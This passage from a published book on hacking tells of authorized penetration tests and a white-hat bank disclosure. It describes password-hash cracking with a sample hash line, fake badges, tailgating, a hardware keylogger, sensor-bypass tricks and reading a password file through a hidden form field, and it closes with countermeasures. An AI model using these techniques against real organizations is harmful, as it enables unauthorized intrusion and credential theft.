     fails, trying another, it fails, trying another, and it fails, too.

  These were the administrator passwords for all the different internal
systems, which the pen testers got all at once from that one span of a few
minutes. Mudge remembers thinking how nice and easy that was.

     The more interesting part was for the voicemails where they were
     talking about their purchase of us. They were telling us, “Yeah, we
     want all you guys.” But on the voicemails to each other, they were
     saying, “Well, we want Mudge, but we don’t want these other
     guys, we’ll fire them as soon as they come on.”

  At the meeting, the l0pht guys played some of the captured voicemail
messages while the executives sat their listening to their own embarrass-
ing words. But the best was yet to come. Mudge had scheduled a final
negotiations session on the buyout so that it had already taken place at
the time of the report meeting. He shared the details of that meeting
with obvious glee.

     So they come in and say, “We’re willing to give you this, it’s the
     highest number that we can go up to, and we’ll do all these
     things.” But we know exactly what parts they’re saying that’s
     true, what parts they’re saying are lies.
     They start off with this low-ball number. And they’re like, “Yeah,
     what do you think?” And we countered with, “Well, we don’t
     think we can do it for less than ...” and named the number we
     knew was their top figure.
     And it’s like, “Oh, oh, we’ll have to talk about this, why don’t you
     give us a few minutes, can you leave us alone in the room?”
     If it wasn’t for those sorts of things, we would have thought very
     seriously about it. But they were trying to pull a fast one.
124                         The Art of Intrusion


  At the report meeting — the final sessions between the representatives
of the two companies — Mudge remembers that “we just wanted to
make sure we could convince them that there wasn’t a machine on the
network we couldn’t have full access to.” Carlos remembers the faces of
several executives “turning kinda red” as they listened.
  In the end the l0pht team walked away. They got to keep the $15,000
but didn’t sell the company that time around.


ONE ALARMING GAME
For security consultant Dustin Dykes, hacking for profit is “exhilarating.
I understand the adrenaline junkies, it’s an absolute high.” So when he
arrived in the lobby conference room of a pharmaceutical company that
we’ll call “Biotech” to discuss doing a penetration test for them, he was
in a good mood and looking forward to the challenge.
  As the lead consultant for the practice of security services of his com-
pany, Callisma, Inc. (now part of SBC), Dustin had called for his team to
attend the meeting dressed in business attire. He was caught off guard
when the Biotech folks showed up in jeans, T-shirts, and shorts, all the
more odd because the Boston area at the time was suffering one of the
coldest winters in memory.
  Despite a background in computer administration — in particular, net-
work operations, Dustin has always considered himself a security person,
an attitude he probably developed while doing a tour of duty in the Air
Force, where, he says, “I cultivated my latent paranoia: the security mind-
set that everybody is out to get you.”
  Hooking up with computers in the seventh grade was his stepmother’s
doing. Back then, she worked for a company as a systems administrator.
Dustin was fascinated by the foreign-sounding language she used when
talking business on the phone. When he was 13, “One night she brought
home a computer that I took to my room and programmed to create
Dungeons and Dragons characters and roll my dice for me.” Delving into
books on Basic and picking up whatever he could glean from friends,
Dustin developed his skills. He taught himself how to use a modem for
dialing into his stepmom’s workplace to play adventure games. At first he
only wanted more and more computer time, but as he grew up he real-
ized that his free spirit wouldn’t be a good match for spending his life at
a terminal. As a security consultant, he could combine his talents with his
need for freedom. This was definitely “a nifty solution.”
  The decision to make a career in security turned out to be a good one.
“I’m thrilled to be in this profession,” he says. “It’s a chess game. Every
move, there’s a counter move. Every move changes the entire dynamics
of the game.”
            Chapter 6   The Wisdom and Folly of Penetration Testing       125


Rules of Engagement
It makes sense for every company to be concerned about how vulnerable
they are — how good a job they’re doing at protecting their intellectual
property, protecting against the loss of public confidence that inevitably
follows a highly publicized break-in, and guarding their employees
against electronic intruders sneaking a look at personal information.
  Some companies are motivated by reasons even more pressing, like not
running afoul of government watchdog agencies that could mean losing
an important contract or setting back a crucial research project. Any com-
pany holding a Department of Defense contract is in this category. So is
any firm doing sensitive biotechnology research that has the Food and
Drug Administration looking over their shoulder — which is the category
that Callisma’s new client fell into. With dangerous chemicals around, and
labs where scientists were conducting research the hackers-for-hire didn’t
want to know about, this one was going to be challenging.
  At the initial meeting with Biotech, the Callisma team learned that the
company wanted to be hit with every possible attack that a true adversary
might try: simple to complex technical attacks, social engineering, and
physical break-ins. The company IT executives, as is often the case, were
certain the pen testers would find their every effort defeated. So Biotech
laid down their scoring rules: Nothing short of solid documentary evi-
dence would be acceptable.
  A “cease and desist” process was established for the test. Sometimes
this can be as simple as an agreed-upon code word from any designated
employee to stop an attack that is negatively affecting the company’s
work. The company also gave guidance on the handling of compromised
information — how it would be contained, when it would be turned over
and to whom.
  Since a pen test carries the possibility of events that might interfere with
the company’s work, several what-ifs also need to be addressed up front.
Who in the chain of command will be notified when there might be a
service disruption? Exactly what parts of the system can be compromised
and how? And how will the testers know to what extent an attack can be
carried out before irreparable damage or loss of business occurs?
  Clients often ask only for a pen test involving a technical attack and
overlook other threats that may leave the company even more vulnerable.
Dustin Dykes explains:

     Regardless of what they say, I know their primary goal is to iden-
     tify their system weaknesses, but usually they are vulnerable in
     another way. A true attacker will go for the path of least resist-
     ance, the weakest link in the security chain. Like water running
126                          The Art of Intrusion


      downhill, the attacker is gonna go for the smoothest method, which
      is most likely with people.

  Social engineering attacks, Dustin advises, should always be part of a
company pen test. (For more on social engineering, see Chapter 10,
“Social Engineers — How They Work and How to Stop Them.”)
  But he would be happy to forgo one other part of the repertoire. If he
doesn’t have to attempt physical entry, he won’t. For him, it’s a last
resort, even carrying his get-out-of-jail-free card. “If something’s going
to go badly wrong, it’ll probably be just when I’m trying to slip into a
building unnoticed by the security force or some suspicious employee.”
  Finally, the pen-test team also needs to know what the Holy Grail is. In
this high-stakes game of electronic sleuthing, it’s vital to know that pre-
cisely. For the pharmaceuticals company, the Holy Grail was their finan-
cial records, customers, suppliers, manufacturing processes, and files on
their R&D projects.


Planning
Dustin’s plan for the test called for starting by “running silent” — keeping
a low profile, then slowly becoming more and more visible until someone
eventually noticed and raised a flag. The approach grows out of Dustin’s
philosophy about pen-test projects, which he refers to as red teaming.

      What I try to accomplish in red teaming efforts is from the defen-
      sive posture that I find companies picking up. They think, “Let’s
      assume the attacker’s mentality. How would we defend against
      it?” That’s already strike one against them. They don’t know how
      they’re going to act or react unless they know what’s important to
      them.

  I agree; as Sun Tzu wrote: Know thy enemy and thyself, and you will
be victorious.
  All thorough pen tests — when the client agrees — use the same types
of attack described earlier in this chapter.

      We identify in our methodology four areas: Technical entry into
      the network, which is much of what we talk about. Social engi-
      neering, [which for us also includes] eavesdropping and shoulder
      surfing. Dumpster diving. And then also physical entry. So those
      four areas.

 (Shoulder surfing is a colorful term for surreptitiously watching an
employee type his or her password. An attacker skilled in this art has
              Chapter 6    The Wisdom and Folly of Penetration Testing   127

learned to watch the flying fingers carefully enough to know what the
person has typed, even while pretending not to be paying attention.)


Attack!
On the first day, Dustin walked into Biotech’s lobby. Off to the right of
the guard station was a restroom and the company cafeteria, both of
which were readily accessible to visitors. On the other side of the guard
station was the same conference room where Dustin’s team had gathered
for their initial meeting with the Biotech executives. The guard was cen-
trally stationed to watch the primary access to the secured entrances, but
the conference room was completely out of his range of vision. Anyone
could walk in, no questions asked. Which is exactly what Dustin and his
teammate did. And then they had plenty of time to take a leisurely look
around. After all, no one knew they were even there.
   They discovered a live network jack, presumably for the convenience of
company personnel who wanted to be able to access the corporate net-
work during meetings. Plugging in an Ethernet cable from his laptop to
the wall jack, Dustin quickly found what he expected: He had access into
the network from behind the company’s firewall, which was an open invi-
tation into the company’s system.
   Like a scene that should have the Mission Impossible music playing in
the background, Dustin fastened to the wall a small wireless access device
(like the one in Figure 6-1) and plugged it into the jack. The device
would permit Dustin’s people to penetrate the Biotech network from
computers in a car or van parked nearby but outside the company’s build-
ing. Transmissions from such a “wireless access point” (WAP) device may
reach distances up to 300 feet. Using a high-gain directional antenna
allows connecting to the hidden WAP from an even greater distance.




Figure 6-1: Wireless device of
the type used in the attack.


  Dustin favors wireless access units that operate on European
channels — which gives his pen team a decided advantage, since the fre-
quencies are much less likely to be detected. Also, “It doesn’t look like a
128                          The Art of Intrusion


wireless access point, so it doesn’t tip people off. I’ve left them up for as
long as a month without them being noticed and taken down.”
  When he installs one of these units, Dustin also puts up a small but very
official-looking note card that reads, “Property of Information Security
Services. Do Not Remove.”
  With temperatures hovering at seven below, neither Dustin nor his
team buddies, now wearing jeans and T-shirts to stay in sync with the
Biotech image, wanted to freeze their butts off sitting in a car parked on
the lot. So they appreciated the fact that Biotech had offered the use of
a small room in a nonsecured area of a nearby building. Nothing fancy,
but the room was warm, and within range of the wireless device. They
were connected — for the company, a little too well connected.
  As the team began exploring Biotech’s network, the initial tentative
reconnaissance located approximately 40 machines running Windows that
had an administrative account with no password, or with a password of pass-
word. In other words, they had no security at all, which as noted in earlier
stories is unfortunately the case on the trusted side of corporate networks,
with companies focusing on perimeter security controls to keep the bad
guys out, but leaving the hosts on the inside vulnerable to attack. An
attacker who finds a way to penetrate or get around the firewall is home free.
  Once he had compromised one of those machines, Dustin extracted all
the password hashes for every account and ran this file through the
l0phtCrack program.


l0phtCrack at Work
On a Windows machine, user passwords are stored in encrypted form (a
“hash”) in an area called the Security Accounts Manager (SAM); the
passwords are not just encrypted, but encrypted in a scrambled form
known as a “one-way hash,” which means the encryption algorithm will
convert the plaintext password to its encrypted form but cannot convert
the encrypted form back to plaintext.
  The Windows operating system stores two versions of the hash in the
SAM. One, the “LAN Manager hash,” or LANMAN, is a legacy version,
a holdover from the pre-NT days. The LANMAN hash is computed from
the uppercase version of the user’s password and is divided into two
halves of seven characters each. Because of the properties, this type of
hash is much easier to crack than its successor, NT LAN Manager
(NTLM), which among other features does not convert the password to
uppercase characters.
  As an illustration, here’s an actual hash for a system administrator of a
company I won’t name:
            Chapter 6   The Wisdom and Folly of Penetration Testing   129

  Administrator:500:AA33FDF289D20A799FB3AF221F3220DC:0ABC818FE0
  5A120233838B9131F36BB1:::

The section between two colons that begins “AA33” and ends “20DC” is
the LANMAN hash. The section from “0ABC” to “6BB1” is the NTLM
hash. Both are 32 characters long, both represent the same password, but
the first is much easier to crack and recover the plaintext password.
  Since most users choose a password that is either a name or a simple
dictionary word, an attacker usually begins by setting l0phtCrack (or
whatever program he’s using) to perform a “dictionary attack” — testing
every word in the dictionary to see if it proves to be the user’s password.
If the program doesn’t have any success with the dictionary attack, the
attacker will then start a “brute-force attack,” in which case the program
tries every possible combination (for example, AAA, AAB, AAC ... ABA,
ABB, ABC, and so on), then tries combinations that include uppercase
and lowercase, numerals, and symbols.
  An efficient program like l0phtCrack can break simple, straightforward
passwords (the kind that maybe 90 percent of the population uses) in
seconds. The more complicated kind may take hours or days, but almost
all account passwords succumb in time.


Access
Dustin soon had cracked most of the passwords.

     I tried logging into the primary domain controller with the
     [administrator] password, and it worked. They used the same
     password on the local machine as on the domain account. Now I
     have administrator rights on the entire domain.

   A primary domain controller (PDC) maintains the master database of
domain users accounts. When a user logs in to the domain, the PDC
authenticates the login request with the information stored in the PDC’s
database. This master database of accounts is also copied to the backup
domain controller (BDC) as a precaution in the event the PDC goes
down. This architecture has been substantially changed with the release of
Windows 2000. These later versions of windows use what is called Active
Directory, but for backward compatibility with old versions of Windows,
there is at least one system that acts as the PDC for the domain.
   He had the keys to Biotech’s kingdom, gaining access to many internal
documents labeled “confidential” or “internal use only.” In his intense way,
Dustin spent hours gathering sensitive information from the highly confi-
dential drug safety files, which contain detailed information about possible
ill effects caused by the pharmaceuticals the company was studying.
130                          The Art of Intrusion


Because of the nature of Biotech’s business, access to this information is
strictly regulated by the Food and Drug Administration, and the success
of the penetration test would need to be the subject of a formal report to
that agency.
  Dustin also gained access to the employee database that gave full name,
email account, telephone number, department, position, and so forth.
Using this information, he was able to select a target for the next phase of
his attack. The person he chose was a company systems administrator
involved in overseeing the pen test. “I figured even though I already had
plenty of sensitive information, I wanted to show that there were multiple
attack vectors,” meaning more than one way to compromise information.
  The Callisma team had learned that if you want to enter a secure area,
there’s no better way than to blend in with a group of talkative employ-
ees returning from lunch. Compared to morning and evening hours
when people may be edgy and irritable, after lunch they tend to be less
vigilant, perhaps feeling a bit logy as their system digests the recent meal.
Conversation is friendly, and the camaraderie is filled with free-flowing
social cues. A favorite trick of Dustin’s is to notice someone getting ready
to leave the cafeteria. He’ll walk ahead of the target and hold the door
for him, then follow. Nine times out of ten — even if it leads to a secured
area — the target will reciprocate by graciously holding the door open
for him. And he’s in, no sweat.


Alarmed
Once the target had been selected, the team needed to figure out a way
to physically enter the secured area, so they could attach to the target’s
computer a keystroke logger — a device that would record every key typed
on the keyboard, even keys typed at startup, before the operating system
had loaded. On a system administrator’s machine, this would likely inter-
cept passwords to a variety of systems on the network. It could also mean
the pen testers would be privy to messages about any efforts to detect
their exploits.
  Dustin was determined not to risk being caught tailgating. A little
social engineering was called for. With free access to the lobby and cafe-
teria, he got himself a good look at the employee badges and set about
counterfeiting one for himself. The logo was no problem — he simply
copied it from the company Web site and pasted it into his design. But it
wouldn’t need to pass a close-up examination, he was sure.
  One set of Biotech offices was located in a nearby building, a shared
facility with offices rented to a number of different companies. The lobby
had a guard on duty, including at night and on weekends, and a familiar
            Chapter 6   The Wisdom and Folly of Penetration Testing          131

card reader that unlocks the door from the lobby when an employee
swiped a badge with the correct electronic coding.

     I go up during the weekend, start flashing the false badge that I’d
     made. I’m flashing the badge across the reader and of course it
     doesn’t work. The security guard comes, opens the door, and
     smiles. I smile back, and blow by him.

  Without a word passing between them, Dustin had successfully gotten
past the guard, into the secured area.
  But the Biotech offices still lay secure behind yet another reader.
Weekend traffic in the building was nil.

     There’s nobody there on the weekend to tailgate through. So, try-
     ing to find an alternate means of entry, I go up a glassed-in
     staircase to the second level and figure I’ll try the door and see if
     it opens or not. I open it, it opens right up, there’s no badge
     requirement.
     But alarms are going off everywhere. Apparently I’m going in
     what’s essentially a fire escape. I jump inside, the door slams
     behind me. On the inside, there’s a sign, “Do not open, alarm
     will sound.” My heart’s beating 100 miles an hour.


The Ghost
Dustin knew exactly which cubicle to head for. The employee database
the team had compromised listed actual physical cube location for every
worker. With the alarm bell still ringing in his ears, he headed for the
cubicle of his target.
  An attacker can capture the keystrokes on a computer by installing soft-
ware that will record each key typed, and periodically email the data to a
specified address. But, determined to demonstrate to the client that they
were vulnerable to being penetrated in a variety of ways, Dustin wanted
to use a physical means of doing the same thing.
  The device he chose for the purpose was the Keyghost (see Figure 6-2).
This is an innocent-looking object that connects between the keyboard
and computer, and, because of its miniature size, is almost guaranteed to
go unnoticed. One model can hold up to half a million keystrokes, which
for the typical computer user represents weeks of typing. (There’s a
downside, however. The attacker must make a return trip to the site
when it’s time to recover the logger and read the data.)
132                             The Art of Intrusion




Figure 6-2: The Keyghost keystroke logger.


  It took Dustin only seconds to unplug the cable from keyboard to
computer, plug in the Keyghost, and reconnect the cable. Getting done
quickly was very much on his mind because “I’m assuming that the alarm
is raised, the time’s counting down, my hands are slightly shaky. I’m
gonna be caught. You know nothing bad is essentially going to happen
because I do have my ‘get-out-of-jail-free’ card, but even so, the adren-
aline is definitely flowing.”
  As soon as the Keyghost was installed, Dustin walked down the main
stairway, which landed him near the security station. Applying another
dose of social engineering, he brazenly confronted the problem.

      I purposely left by the door that was right next to Security. Instead
      of trying to avoid Security on my way out, I went directly up to
      [the guard]. I said, “Look, I’m sorry for setting off the alarm,
      that was me. I never come over to this building, I didn’t think
      that would happen, I really apologize.” And the guard said, “Oh,
      no problem.”
      Then he hopped on the phone, so I’m assuming he called somebody
      when the alarm went off and now was calling to say “False
      alarm, it’s okay.”
      I didn’t stay around to listen.


Unchallenged
The pen test was drawing to a close. The company’s security executives
had been so confident that the pen testers would not be able to penetrate
the network and would not be able to gain unauthorized physical access
to the buildings, yet no team member had been challenged. Dustin had
slowly been raising the “noise level,” making their presence more and
more obvious. Still nothing.
  Curious about how much they could get away with, several team mem-
bers gained access to a company building by tailgating, lugging with
them an enormous antenna, an in-your-face contraption that took a real
effort to carry. Some employee would surely notice this freaky device,
wonder about it, and blow the whistle.
           Chapter 6   The Wisdom and Folly of Penetration Testing         133

  So, without badges, the team roamed first one of Biotech’s secured
buildings and then the other, for three hours. No one said a single thing
to them. No one even asked a simple question like “What the hell is that
thing?” The strongest response came from a security guard who passed
them in a hallway, gave them a strange look, and moved on his way with-
out even a glance back over his shoulder.
  The Callisma team concluded that, as in most organizations, anyone
could walk in off the street, bring in their own equipment, wander
throughout the buildings, and never be stopped or asked to explain
themselves and show authorization. Dustin and his teammates had
pushed the envelope to an extreme without a challenge.


Hand Warmer Trick
It’s called a Request to Exit (REX), and it’s a common feature in many
business facilities like Biotech’s. Inside a secure area such as a research
lab, you approach a door to exit and your body triggers a heat or motion
sensor that releases the lock so you can walk out; if you’re carrying, say,
a rack of test tubes or pushing a bulky cart, you don’t have to stop and
fumble with some security device to get the door to open. From outside
the room, to get in, you must hold up an authorized ID badge to the
card reader, or punch in a security code on a keypad.
  Dustin noticed that a number of the doors at Biotech outfitted with
REX had a gap at the bottom. He wondered if he could gain access by
outsmarting the sensor. If from outside the door he could simulate the
heat or motion of a human body on the inside of the room, he might be
able to fool the sensor into opening the door.

     I bought some hand warmers, like you get at any outdoor supply
     store. Normally, you put them in your pockets to keep warm. I let
     one get nice and warm, then hooked it to a stiff wire, which I slid
     under the door and started fishing up toward the sensor, waving
     it back and forth.
     Sure enough, it tripped the lock.

   Another taken-for-granted security measure had just bitten the dust.
   In the past, I’ve done something similar. The trick with the type of
access-control device designed to detect motion instead of heat is to
shove a balloon under the door, holding on to the open end. You fill the
balloon with helium and tie it off the end with a string, then let up float
up near the sensor and manipulate it. Like Dustin’s hand warmer, with a
little patience, the balloon will do the trick.
134                          The Art of Intrusion


End of the Test
The Biotech lights were on but no one was home. Although the com-
pany IT executives claimed they were running intrusion-detection sys-
tems, and even produced several licenses for host-based intrusion
detection, Dustin believes the systems were either not turned on or no
one was really checking the logs.
   With the project coming to a close, the Keyghost had to be retrieved
from the system administrator’s desk. It had remained in place for two
weeks without being noticed. Since the device was located in one of the
more difficult areas to tailgate, Dustin and a teammate hit the end of
lunch rush and jumped to grab the door and hold it open, as if being
helpful, as an employee started through. Finally, and for the first and only
time, they were challenged. The employee asked if they had badges.
Dustin grabbed at his waist and flashed his fake badge, and that casual
movement seemed to satisfy. They didn’t look frightened or embarrassed,
and the employee continued into the building, allowing them to enter as
well without further challenge.
   After gaining access to the secured area, they made their way to a con-
ference room. On the wall was a large whiteboard with familiar termi-
nology scribbled on it. Dustin and his colleague realized they were in the
room where Biotech held their IT security meetings, a room the com-
pany would definitely not have wanted them to be in. At that moment,
their sponsor walked in, and looked stunned to find them there. Shaking
his head, he asked what they were doing. Meanwhile, other Biotech secu-
rity people were arriving in the meeting room, including the employee
they had tailgated at the building entry door.

      He saw us and said to our sponsor, “Oh, I’d just like you to know
      that I challenged them on the way in.” This dude was actually
      proud he’d challenged us. Embarrassment is what he should have
      been feeling, because his single question challenge wasn’t strong
      enough to find out if we were legitimate.

  The supervisor whose desk was rigged with the Keyghost also arrived
for the meeting. Dustin took advantage of the opportunity and went to
her cubicle to reclaim his hardware.


Looking Back
At one point during the test, certain someone would notice, Dustin and
the team had brazenly scanned the company’s entire network, end to
end. There wasn’t a single response to this invasive procedure. Despite
behaviors that Dustin describes as “screaming and shouting,” the client’s
            Chapter 6   The Wisdom and Folly of Penetration Testing         135

people never noticed any of the attacks. Even the “noisy” network scans
to identify any potentially vulnerable systems had never been noticed.

     At the end we were running scans taking up huge amounts of
     network bandwidth. It was almost as if we were saying, “Hey,
     catch us!”

  The team was amazed at how numb the company seemed to be, even
knowing full well that the pen testers would be trying their damnedest to
break in.

     By the end of the test, it was bells, whistles, screaming, shouting,
     and rattling pans. Nothing! Not a single flag raised.
     This was a blast. It was overall my favorite test ever.


INSIGHT
Anyone curious about the ethics of a security consultant, whose work
requires slipping into places (both literally and figuratively) that an out-
sider is not supposed to be, will find the techniques of Mudge and Dustin
Dykes enlightening.
  While Mudge used only technical methods in the attack he described,
Dustin used some social engineering as well. But he didn’t feel very good
about it. He has no qualms with the technical aspects of the work and
admits to enjoying every moment of it. But when he has to deceive peo-
ple face to face, he becomes uncomfortable.

     I was trying to rationalize why this is. Why does one rip at me
     and the other has no effect? Maybe we’re brought up not to lie to
     people, but we’re not taught computer ethics. I would agree that
     there’s generally less compunction when fooling a machine than
     deceiving your fellow man.

  Still, despite his qualms, he regularly feels an adrenalin rush whenever
he pulls off a smooth social engineering caper.
  As for Mudge, I think it’s fascinating that, while he wrote a very pop-
ular password-cracking tool, in other areas he relies on methods that are
the stock-in-trade of hackers everywhere.


COUNTERMEASURES
Mudge identified a default firewall rule that allowed incoming connections
to any high TCP or UDP port (over 1024) from any packet that had a
136                         The Art of Intrusion


source port of 53, which is the port for DNS. Exploiting this configura-
tion, he was able to communicate with a service on the target computer
that eventually allowed him to gain access to a mount daemon, which
enables a user to remotely mount a file system. Doing this, he was able
to gain access to the system by exploiting a weakness in NFS (network
file system), and gain access to sensitive information.
   The countermeasure is to carefully review all firewall rules to ensure
they’re consistent with company security policy. During this process,
keep in mind that anyone can easily spoof a source port. As such, the fire-
wall should be configured to allow connectivity only to specific services
when basing the rule on the source port number.
   As mentioned elsewhere in this book, it’s very important to ensure that
both directories and files have proper permissions.
   After Mudge and his colleagues successfully hacked into the system,
they installed sniffer programs to capture login name and passwords. An
effective countermeasure would be using programs based on crypto-
graphic protocols, such as ssh.
   Many organizations will have policies regarding passwords or other
authentication credentials for accessing computer systems, but fall short
on PBX or voicemail systems. Here, the l0pht team had easily cracked
several voicemail box passwords belonging to executives at the target
company, who were using typical default passwords, like 1111, 1234, or
the same as the phone extension. The obvious countermeasure is to
require reasonably secure passwords to be set on the voicemail system.
(Encourage employees not to use their ATM pin either!)
   For computers containing sensitive information, the method described
in the chapter for constructing passwords using special nonprinting char-
acters created with the Num Lock, <Alt> key, and numeric keypad is
highly recommended.
   Dustin was able to freely walk into Biotech’s conference room, since it
was located in a public area. The room had live network jacks that con-
nected to the company’s internal network. Companies should either dis-
able these network jacks until needed or segregate the network so that
the company’s internal network is not accessible from public areas.
Another possibility would be a front-end authentication system that
requires a valid account name and password before allowing the person
to communicate.
   One method to mitigate tailgating attacks is to modify what social psy-
chologists call the politeness norm. Through appropriate training, com-
pany personnel need to overcome the discomfort that many of us feel
about challenging another person, as often happens when entering a
building or work area through a secured entrance. Employees properly
           Chapter 6   The Wisdom and Folly of Penetration Testing   137

trained will know how to politely question about the badge when it’s
apparent the other person is attempting to “tag along” with them
through the entrance. The simple rule should be this: Ask, and if the per-
son doesn’t have a badge, refer them to security or the receptionist, but
don’t allow strangers to accompany you into a secured entrance.
   Fabricating phony corporate ID badges offers a too-easy technique for
walking into a supposedly secure building unchallenged. Even security
guards don’t often look at a badge closely enough to tell whether it’s the
genuine goods or a fake. This would be tougher to get away with if the
company established (and enforced) a policy calling on employees, con-
tractors, and temporary workers to remove their badges from public view
when they leave the building, depriving would-be attackers with lots of
opportunities to get a good look at the badge design.
   We all know security guards are not going to examine each employee’s
ID card with close scrutiny (which, after all, would be a near impossibil-
ity for even a conscientious guard when streams of people parade past
first thing in the morning and at the end of the day). So, other methods
of protecting against unwanted entry by an attacker need to be consid-
ered. Installing electronic card readers brings a much higher degree of
protection. But in addition, security guards must be trained how to thor-
oughly question anyone whose card is not recognized by the card reader,
since, as suggested in the story, the problem may not be a small glitch in
the system but an attacker attempting to gain physical entry.
   While company-wide security awareness training has been growing
much more common, it’s almost always lacking in a big way. Even com-
panies with an active program often overlook the need for specialized
training for managers so that they are appropriately equipped to ensure
that those under them are following the mandated procedures.
Companies that are not training all employees in security are companies
with weak security.


THE BOTTOM LINE
It’s not often that readers are afforded the opportunity of gaining insight
into the thinking and the tactics of someone who has contributed signif-
icantly to the arsenal of hacker’s tools. Mudge and l0phtCrack are in the
history books.
  In the view of Callisma’s Dustin Dykes, companies asking for a pene-
tration test often make decisions against their own best interests. You’ll
never know how vulnerable your company truly is until you authorize a
full-scale, no-holds-barred test that allows social engineering and physi-
cal entry, as well as technical-based attacks.
             Chapter 7
             Of Course Your Bank
              Is Secure — Right?
If you try to make your systems foolproof, there is always one more fool who
is more inventive than you.
                                                                  — Juhan




E
          ven if other organizations don’t measure up in their security
          practices to bar the door to hackers, at least we’d like to think
          that our money is safe, that no one can obtain our financial
information or even, nightmare of nightmares, get to our bank accounts
and issue commands that put our money into their pockets.
  The bad news is that the security at many banks and financial institu-
tions is not as good as the people responsible for it imagine it is. The fol-
lowing stories illustrate the point.


IN FARAWAY ESTONIA
This story illustrates that sometimes even a guy who isn’t a hacker can
successfully hack into a bank. That’s not good news for the banks, or for
any of us.
  I have never visited Estonia, and may never get there. The name con-
jures up images of ancient castles surrounded by dark woods and super-
stitious peasants — the sort of place a stranger doesn’t want to go
wandering about without an ample stash of wooden stakes and silver bul-
lets. This ignorant stereotype (helped along by corny low-budget horror


                                      139
140                          The Art of Intrusion


flicks set in Eastern European woods, hamlets, and castles) turns out to
be more than a little inaccurate.
   The facts turn out to be quite different. Estonia is a good deal more
modern than I pictured, as I learned from a hacker named Juhan who
lives there. Twenty-three-year-old Juhan lives alone in a spacious four-
room apartment in the heart of the city with “a really high ceiling and a
lot of colors.”
   Estonia, I learned, is a small country of about 1.3 million (or roughly
the population of the city of Philadelphia) stuck between Russia and the
Gulf of Finland. The capital city of Tallinn is still scarred by massive con-
crete apartment buildings, drab monuments to the long-dead Soviet
empire’s attempt to house its subjects as economically as possible.
   Juhan complained, “Sometimes when people want to know about
Estonia, they ask things like, ‘Do you have doctors? Do you have a uni-
versity?’ But the fact is that Estonia is joining the European Union on the
first of May [2004].” Many Estonians, he says, are working toward the
day when they can move out of their cramped Soviet-era apartment to a
small home of their own in a quiet suburb. And they dream of being able
to “drive a reliable import.” In fact, a lot of people already have cars and
more and more people are getting their own homes, “so it’s improving
every year.” And technologically, as well, the country is no backwater, as
Juhan explained:

      Estonia already in the beginning of nineties started to implement
      the infrastructure of electronic banking, ATMs and Internet
      banking. It’s very modern. In fact, Estonian companies provide
      computer technology and services to other European countries.

  You might think this would describe a hacker’s heaven: all that Internet
use and probably way behind the curve when it comes to security. Not
so, according to Juhan:

      Regarding the Internet security, this, in general, is a good place
      due to the fact that the country and communities are so small. It’s
      actually quite convenient for service providers to implement tech-
      nologies. And, regarding the financial sector, I think the fact
      that enables the Americans to make a connection is that Estonia
      has never had an infrastructure of bank checks — the checks that
      you’re using to pay a lot of bills in the shops.

  Very few Estonians ever go into a bank office, he says. “Most people
have checking accounts, but don’t know what a bank check looks like.”
             Chapter 7   Of Course Your Bank Is Secure — Right?             141

Not because they’re unsophisticated about financial things but because,
in this area, at least, they are ahead of us, as Juhan explains:

     We’ve never had a large infrastructure of banks. Already, in the
     beginning of the nineties, we’d started implementing the infra-
     structure of electronic banking and Internet banking. More than
     90 to 95 percent of people and businesses transferring money to
     each other are using Internet banking.

  And they use credit cards, or “bank cards” in the European terminology.

     It’s more convenient to use direct payment in the form of Internet
     banking or bank cards, and there is just no reason for people to
     use checks. Unlike America, nearly everyone here uses the Internet
     for banking and to pay their bills


The Bank of Perogie
Juhan has been heavily into computers since the tender age of 10, but
doesn’t consider himself a hacker, just a white hat serious about security.
Interviewing him was no problem — he started learning English in
school beginning in second grade. The young Estonian has also done a
lot of studying and traveling abroad, giving him further opportunities to
develop his English conversational skills.
  One recent winter in Estonia was especially harsh, with polar condi-
tions, snow banks all around, and temperatures down to minus 25
degrees Celsius (13 degrees below zero Fahrenheit). It was so bitter that
even the locals, who were used to frigid winters, didn’t want to go out
unless they had to. This was a good time for a computer guy to stay glued
to his screen, hunting for anything good enough to capture his attention.
  That’s what Juhan was doing when he stumbled onto the Web site of
what we’ll call the Bank of Perogie. It looked like a target worth exploring.

     I stepped into the interactive FAQ section that allows people to
     post questions. I have the habit of looking into Web page form
     sources. I sort of just got to a Web site and I started to look into
     it. You know the process yourself — you surf around and you just
     browse without any strategic purpose.

  He could see that the file system was the type used by Unix. That
immediately narrowed the type of attacks he would try. Viewing the
source code of several web pages revealed a hidden variable that pointed
to a filename. When he tried changing the value stored in the hidden
form element, “It became clear that they didn’t do any sort of request for
142                           The Art of Intrusion


authentication. So whether I submitted input from a bank site or from a
local PC didn’t matter to the bank server,” he said.
  He changed the attributes of the hidden form element to point to the
password file, which allowed him to display the password file on his
screen. He discovered that the passwords were not “shadowed,” which
means the standard encrypted form of every account’s password was vis-
ible on his display. So, he was able to download the encrypted passwords
and run them through a password cracker.
  Juhan’s password cracker program of choice was a well-known one with
the deliciously amusing name of “John the Ripper,” which he ran using
a standard English dictionary. Why English instead of Estonian? “It’s
common practice around here to use English passwords.” But the fact is
that many Estonians have a good basic knowledge of English.
  The cracker program didn’t take long, only about 15 minutes on his PC,
since the passwords were basic — simple English words with a few num-
bers tacked on the end. One of them was golden: he recovered the root
password, giving him administrator’s privileges. And there was more:

      There is this one telebanking service that has a trade name which
      I’m not sure if I should mention here, but [I found] an account
      for that service. It looked like it was probably the system account
      that was running the services on that server.

 He didn’t go further in this direction, explaining that “having passwords
was the point where I stopped.” Prudence was the name of the game.

      I could get in trouble. After all, I work in the information secu-
      rity business. I had some motivation not to do any harm.
      But the situation looked too good to be true. I figured it might be
      a honey pot, a trap to lure people like me in and then get prose-
      cuted. So I contacted my superiors and they reported it to the bank.

  His disclosure didn’t get him into hot water with his employer, nor
with the bank, but quite the opposite. His company was offered the
assignment of investigating further and coming up with a solution to
plug the loophole. Juhan’s company put him on the job, figuring he
could finish what he’d already started.

      It was sort of surprising to me that the events went like that
      because actually the Internet security in Estonia is at a better
      level than it is elsewhere. This is not determined by me, but is said
      by many people who have come here from other places. So it was
             Chapter 7   Of Course Your Bank Is Secure — Right?            143

     kind of surprising for me to find out this one hole and then how
     easy it was to get my hands on very secret sort of information.


Personal Opinion
From experiences like this, Juhan has come to believe it’s in the best
interest of a company that finds itself compromised by a hacker not to
prosecute, but instead work with the hacker to fix whatever problems he
or she has uncovered — sort of a “if you can’t beat ’em, join ’em” phi-
losophy. Of course, the government doesn’t usually see it this way, as
proven yet again with the hounding of Adrian Lamo (see Chapter 5,
“The Robin Hood Hacker”), saddled with a felony conviction despite
the fact that he (for the most part) provided a public service by advising
